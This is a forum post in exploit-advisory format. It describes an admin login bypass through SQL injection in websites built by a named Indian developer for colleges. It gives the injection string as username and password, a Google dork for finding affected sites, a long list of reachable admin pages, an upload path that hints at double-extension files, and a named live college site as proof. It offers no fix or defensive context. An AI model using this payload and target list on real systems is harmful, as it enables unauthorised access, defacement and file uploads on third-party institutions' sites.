Subject: Design By Dr. Hardik Desai Chirag Lad Admin Bypass Vuln
Comment: #1
29.06.2018 02:46
#################################################################################################

# Exploit Title : Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : chiraglad.in
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork : intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad''

# Administration Control Panel Path => /admin/

# Exploit : Both are correct login credentials [ '=''or' ] or [ anything' OR 'x'='x ]

Username : anything' OR 'x'='x

Password : anything' OR 'x'='x

Useable Administration Control Panel URL Links =>

/admin/dashboard.php
/admin/about_index.php
/admin/about_edit.php
/admin/trustees_index.php
/admin/trustees_edit.php
/admin/facilities_index.php
/admin/facilities_edit.php
/admin/college_index.php
/admin/college_edit.php
/admin/course_edit.php
/admin/course_index.php
/admin/coursecontent_index.php
/admin/coursecontent_create.php
/admin/faculty_index.php
/admin/faculty_edit.php
/admin/comittees_index.php
/admin/comittees_create.php
/admin/activitymenu_index.php
/admin/activitymaster_index.php
/admin/activitymaster_edit.php
/admin/activitysub_index.php
/admin/activitysub_edit.php
/admin/activityrecords_index.php
/admin/activityrecords_edit.php
/admin/awardscategory_index.php
/admin/awards_index.php
/admin/awards_edit.php
/admin/placementmenu_index.php
/admin/placementmenu_edit.php
/admin/placement_index.php
/admin/placement_create.php
/admin/contact_details.php
/admin/alumni_details.php
/admin/news_index.php
/admin/news_create.php
/admin/staff_index.php
/admin/staff_create.php
/admin/change_password.php

Uploaded Files Path through Admin Panel =>

/admin/uploaded_files/[RANDOM-NUMBERS-ALPHABETS-yourfilename.png] .jpg .gif .pdf .html .htm shtml.jpg

#################################################################################################

# Example Site => naranlalacollege.in => [ Proof of Concept for the Vulnerability ] => archive.is/4mYlj

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# There is an organ in the human body. If it is healthy, the whole body is healthy;
if it is corrupted, the whole body is corrupted. Take heed! It is the heart.
[ Hz.Muhammed S.A.V ] #

